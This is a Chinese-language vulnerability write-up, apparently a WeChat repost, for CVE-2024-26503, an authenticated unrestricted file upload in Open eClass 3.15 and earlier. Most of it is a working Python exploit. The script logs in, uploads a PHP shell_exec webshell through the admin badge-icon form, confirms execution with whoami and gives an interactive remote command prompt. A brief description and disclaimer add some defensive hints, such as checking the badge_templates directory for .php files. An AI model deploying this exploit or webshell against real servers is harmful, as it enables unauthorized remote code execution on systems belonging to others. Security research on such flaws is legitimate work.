漏洞描述
Greek Universities Network Open eClass v.3.15 及更早版本中的无限制文件上传漏洞允许攻击者上传恶意文件，从而获取服务器权限。注意：下文脚本先以有效账号登录，再向 modules/admin/certbadge.php 的徽章图标表单提交 .php 文件，因此本漏洞是需认证的（所用账号须能访问该管理端上传接口）；上传成功后 webshell 落在 courses/user_progress_data/badge_templates/ 目录下，应急排查时可检查该目录是否存在 .php 文件及相关访问日志。
资产测绘
FOFA:
漏洞复现
python exploit.py -u '<username>' -p '<password>' -e 'http://<target-host>'   # -e 为 Open eClass 根 URL，不带结尾斜杠亦可
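import argparse
import sys

try:
    import requests
except ImportError:  # main() reports the missing dependency instead of a bare traceback
    requests = None

# ANSI colour codes used by the interactive prompt.
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'

# Name the PHP shell is uploaded under, and the web path where the badge-icon
# upload is expected to store it on a vulnerable target.
SHELL_NAME = 'execute.php'
SHELL_DIR = '/courses/user_progress_data/badge_templates'
# Payload body (byte-identical to the original exploit): runs the GET parameter
# 'cmd' through shell_exec() and echoes the output.
SHELL_SOURCE = '<?php echo shell_exec($_GET[\'cmd\']) ;?>'
# Per-request timeout in seconds so a silent target cannot hang the tool forever.
TIMEOUT = 15


def banner() -> None:
    """Print a one-line header naming the tool.

    The original listing carried a whitespace-collapsed figlet banner that could
    not be recovered from the page, so a plain line is printed instead.
    """
    print(f"{RED}Open eClass <= 3.15 - CVE-2024-26503 - unrestricted badge-icon upload to RCE{RESET}")


def target_base(openeclass: str) -> str:
    """Return *openeclass* without trailing slashes so later path joins do not produce '//'."""
    return openeclass.rstrip('/')


def shell_url(openeclass: str) -> str:
    """Return the absolute URL at which the uploaded shell is expected on the target."""
    return f"{target_base(openeclass)}{SHELL_DIR}/{SHELL_NAME}"


def run_shell_command(openeclass: str, cmd: str):
    """Send *cmd* to the uploaded shell and return the response body as a string.

    The command is passed via ``params=`` so requests percent-encodes it; building
    the query string by concatenation (the original approach) breaks on commands
    containing '&', '#' or '+'. Returns None after printing a diagnostic on a
    transport error or on any status other than 200.
    """
    try:
        response = requests.get(shell_url(openeclass), params={'cmd': cmd}, timeout=TIMEOUT)
    except requests.exceptions.RequestException as e:
        print(f"{RED}An error occurred: {e}{RESET}")
        return None
    if response.status_code != 200:
        print(f"{RED}Unexpected HTTP status {response.status_code} from the shell{RESET}")
        return None
    return response.text


def remove_web_shell(openeclass: str) -> None:
    """Best-effort removal of the shell from the target.

    Runs ``rm execute.php`` relative to the shell's own directory, exactly as the
    original exploit did; this relies on PHP's working directory being that
    directory (not verified here). Request the shell URL afterwards and expect a
    404 if you need confirmation that nothing was left behind.
    """
    print(f"{ORANGE}\nExiting... removing '{RED}{SHELL_NAME}{ORANGE}'{RESET}")
    run_shell_command(openeclass, f"rm {SHELL_NAME}")


def execute_command(openeclass: str) -> None:
    """Interactive command loop against the uploaded shell.

    Reads commands until 'quit' (case-insensitive), Ctrl-C or EOF, printing each
    response body in green. The shell is removed in a ``finally`` so that an
    interrupted session does not leave a backdoor on the target (the original
    only cleaned up on an explicit 'quit').
    """
    try:
        while True:
            cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")
            if cmd.lower() == "quit":
                break
            output = run_shell_command(openeclass, cmd)
            if output is not None:
                print(f"{GREEN}{output}{RESET}")
    except (KeyboardInterrupt, EOFError):
        print()  # keep the "removing" message on its own line after ^C / ^D
    finally:
        remove_web_shell(openeclass)


def upload_web_shell(openeclass: str, username: str, password: str) -> bool:
    """Log in and upload the PHP shell through the badge-icon form.

    Authenticates with *username*/*password* (the upload endpoint lives under
    modules/admin/, so the account must be allowed to reach it), then posts
    SHELL_SOURCE as the 'icon' file of modules/admin/certbadge.php. Vulnerable
    versions store the upload under SHELL_DIR with its .php name intact, which is
    what CVE-2024-26503 is about.

    Returns True when both the login and the upload requests came back with a
    non-error HTTP status. That is not proof the shell landed (a failed login may
    still answer 200), so callers should verify with is_successfull(). Transport
    errors propagate as requests.RequestException.
    """
    base = target_base(openeclass)
    login_url = f'{base}/?login_page=1'
    login_page_url = f'{base}/main/login_form.php?next=%2Fmain%2Fportfolio.php'
    payload = {
        'next': '/main/portfolio.php',
        'uname': f'{username}',
        'pass': f'{password}',
        'submit': 'Enter',
    }
    headers = {'Referer': login_page_url}
    files = {
        # Declared as text/plain; the vulnerable server does not act on the .php extension.
        'icon': (SHELL_NAME, SHELL_SOURCE, 'text/plain'),
        'name': (None, ''),
        'description': (None, ''),
        'submit_badge_icon': (None, ''),
    }
    with requests.Session() as session:
        # Fetch the form first so the session holds whatever cookie the login expects.
        session.get(login_page_url, timeout=TIMEOUT)
        login = session.post(login_url, headers=headers, data=payload, timeout=TIMEOUT)
        if not login.ok:
            print(f"{RED}Login request failed with HTTP {login.status_code}{RESET}")
            return False
        upload = session.post(f'{base}/modules/admin/certbadge.php', files=files, timeout=TIMEOUT)
        if not upload.ok:
            print(f"{RED}Upload request failed with HTTP {upload.status_code}{RESET}")
            return False
    return True


def is_successfull(openeclass: str) -> bool:
    """Probe the uploaded shell with 'whoami' and report whether it answered.

    Kept under its original (misspelled) name for existing callers. Returns True
    only for an HTTP 200; any other status prints "EXPLOITATION FAILED" and a
    transport error prints the exception, both returning False (the original
    returned None on exceptions). A 200 alone does not prove code execution — a
    catch-all page can also answer 200 — so the reply is echoed for the operator.
    """
    try:
        response = requests.get(shell_url(openeclass), params={'cmd': 'whoami'}, timeout=TIMEOUT)
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")
        return False
    if response.status_code != 200:
        print("EXPLOITATION FAILED")
        return False
    print(f"{GREEN}whoami: {response.text.strip()}{RESET}")
    return True


def main() -> None:
    """Parse arguments, upload the shell, and drop into the command loop if it answers."""
    parser = argparse.ArgumentParser(
        description="Open eClass – CVE-2024-26503: Unrestricted File Upload Leads to Remote Code Execution"
    )
    parser.add_argument('-u', '--username', required=True, help="Username for login")
    parser.add_argument('-p', '--password', required=True, help="Password for login")
    parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
    args = parser.parse_args()
    if requests is None:
        sys.exit("The 'requests' package is required: pip install requests")
    banner()
    if not upload_web_shell(args.eclass, args.username, args.password):
        sys.exit(1)
    if not is_successfull(args.eclass):
        sys.exit(1)
    execute_command(args.eclass)


if __name__ == "__main__":
    main()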
原文始发于微信公众号(漏洞文库):【漏洞复现】CVE-2024-26503
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。